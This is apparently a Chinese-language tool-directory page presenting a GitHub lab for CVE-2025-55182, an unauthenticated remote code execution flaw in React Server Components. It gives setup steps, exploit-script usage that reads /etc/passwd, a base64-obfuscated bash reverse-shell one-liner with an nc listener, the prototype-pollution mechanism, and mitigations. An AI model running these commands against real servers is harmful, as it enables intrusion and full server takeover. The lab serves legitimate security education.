Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
react2shell-lab — CVE-2025-55182 React2Shell PoC 实验室 | Kitploit
工具/GitHubGitHub/alsaut1/react2shell-lab
漏洞分析代码分析漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育远程访问工具Payload 开发实验室与实践
GitHubalsaut1/react2shell-lab

react2shell-lab

CVE-2025-55182 React2Shell PoC 实验室

78个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库

React2Shell - CVE-2025-55182 实验室

一个用于演示和测试 React Server Components 中严重漏洞 CVE-2025-55182 的综合性实验室。

⚠️ 仅限教育目的

本仓库旨在用于:

  • 安全研究与教育
  • 理解漏洞机制
  • 在自有系统上进行测试
  • 漏洞赏金猎捕准备

请勿将其用于你不拥有或未经明确授权的系统。未经授权访问属于违法行为。

🔴 漏洞详情

  • CVE 编号:CVE-2025-55182
  • CVSS 评分:10.0(严重)
  • 类型:未认证远程代码执行(RCE)
  • 受影响组件:
    • React 19.0.0 - 19.2.0
    • Next.js 15.x - 16.x
  • 根本原因:React Server Components “Flight” 协议中的不安全反序列化

⚡ 能力

✅ 无需认证即可执行任意命令
✅ 读取系统文件
✅ 创建和修改文件
✅ 建立反向 Shell 连接
✅ 实现完全服务器控制

🚀 快速开始

1. 安装

root@kitploit:~
npm install --legacy-peer-deps
npm run dev

服务器将在 http://localhost:3000 启动

2. 检查漏洞

root@kitploit:~
bash check-cve.sh

3. 运行漏洞利用

root@kitploit:~
cd exploit
python3 rce_final.py "whoami"
python3 rce_final.py "id > /tmp/id.txt &"
python3 rce_final.py "cat /etc/passwd > /tmp/passwd.txt &"

4. 反向 Shell

root@kitploit:~
# 终端 1 - 监听器
nc -lvnp 4444

# 终端 2 - 漏洞利用
python3 rce_final.py "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx | base64 -d | bash &"

📁 项目结构

root@kitploit:~
├── app/              # 易受攻击的 Next.js 应用程序
├── exploit/          # 可用的 PoC 漏洞利用
│   └── rce_final.py  # 主漏洞利用脚本
├── check-cve.sh      # 自动化漏洞检测器
├── package.json      # 易受攻击的依赖项
└── README.md

🔧 技术细节

该漏洞存在于 React Server Components 负载的反序列化逻辑中。该漏洞利用原型污染通过 process.mainModule.require('child_process').execSync() 执行任意代码。

攻击流程

  1. 构造恶意 multipart 表单数据
  2. 发送至易受攻击的 React 应用程序
  3. 利用 “Flight” 协议中的不安全反序列化漏洞
  4. 在服务器上实现 RCE

📊 影响范围

  • 机密性:高(可读取任意文件)
  • 完整性:高(可修改/创建文件)
  • 可用性:高(可执行拒绝服务命令)

✅ 缓解措施

  1. 将 React 更新至 19.2.1 或更高版本
  2. 将 Next.js 更新至 15.0.5+ 或 16.0.7+
  3. 部署 Web 应用防火墙(WAF)规则
  4. 监控服务器日志以发现漏洞利用尝试
  5. 使用运行时保护机制

📚 参考资料

  • react2shell.com
  • CVE-2025-55182 详情
  • React 安全公告
  • CVSS 计算器

⚖️ 法律免责声明

本代码仅供教育和授权安全测试之用。用户有责任确保在测试任何系统之前已获得适当授权。根据《计算机欺诈和滥用法》(CFAA)及其他司法管辖区的类似法律,未经授权访问计算机系统属于违法行为。

作者对滥用此信息不承担任何责任。

🎓 学习目标

完成本实验室后,你将理解:

  • 不安全反序列化漏洞的工作原理
  • 原型污染攻击技术
  • React Server Components 架构
  • RCE 漏洞利用方法
  • 正确的漏洞披露实践
下载工具